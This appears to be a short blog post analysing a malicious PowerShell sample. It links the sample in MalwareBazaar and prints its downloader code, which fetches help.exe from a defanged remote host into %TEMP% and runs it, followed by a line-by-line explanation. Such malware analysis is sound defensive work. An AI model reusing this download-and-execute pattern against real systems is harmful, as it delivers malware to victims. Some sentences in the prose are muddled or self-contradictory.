Analysis Malicious Powershell Script

By





Attackers are always trying to find new mechanisms and methods to carry out a cyber attack. And of course, the developers of malware are always looking for different mechanisms and special ways to reach the target device in the easiest way and without being checked by radars (anti-virus programs). In this series of articles we will begin to analyze several malicious scripts, especially PowerShell scripts that are currently heavily relied upon by attackers. So What is PowerShell ؟ and why is it most often used by attackers and developers of malware such as downloaders or droppers? Instead, it is sometimes installed in malicious documents such as Office Documents. PowerShell is actually a programming language (scripting language) produced by Microsoft . in PowerShell can interact with Windows very well and is very fast! This has led attackers to rely on it for certain purposes, for example: enumeration, reconnaissance, anti-VM, etc. PowerShell can also be used for many other topics and tasks. This has made attackers more reliant on scripting languages such as BatchScript or VBSScript. This is because PowerShell can interact more and faster with the system itself and has an open hand to intervene and work with the system in many different ways and mechanisms. In fact, working with PowerShell depends on the attacker's mindset when creating and developing malware. 

Sample SHA256 : 63b56da83ddf792c7753515af5e5b25816a54e1fc10bcc6693b7028e645df2a6

Download a Sample : https://bazaar.abuse.ch/sample/63b56da83ddf792c7753515af5e5b25816a54e1fc10bcc6693b7028e645df2a6/

Malicious Code :

$webClient = New-Object System.Net.WebClient
$url1 = "httpx[://]signin[.]clouddomainservice.com/help.exe"
$filePath1 = "$env:TEMP\help.exe"
$webClient.DownloadFile($url1, $filePath1)
Start-Process -FilePath $env:TEMP\help.exe

 

Code Explanations  :

  1. Malware Developer declared $webClient , $url1 , $filePath1 , $webClient.DownloadFile . as variable .
  2. Malware Developer a web client object through New-Object System.Net.WebClient .
  3. Malware Developer Download [ help.exe ] that hosted cloud httpx[://]signin[.]clouddomainservice.com/help.exe.
  4. Malware Developer Drop the hosted payload into %Temp% .
  5. Malware Developer Download a help.exe $webClient.DownloadFile($url1, $filePath1) .
  6. Malware Developer Execute the Downloaded help.exe from %TEMP% Directory .

 

Comments

Post a Comment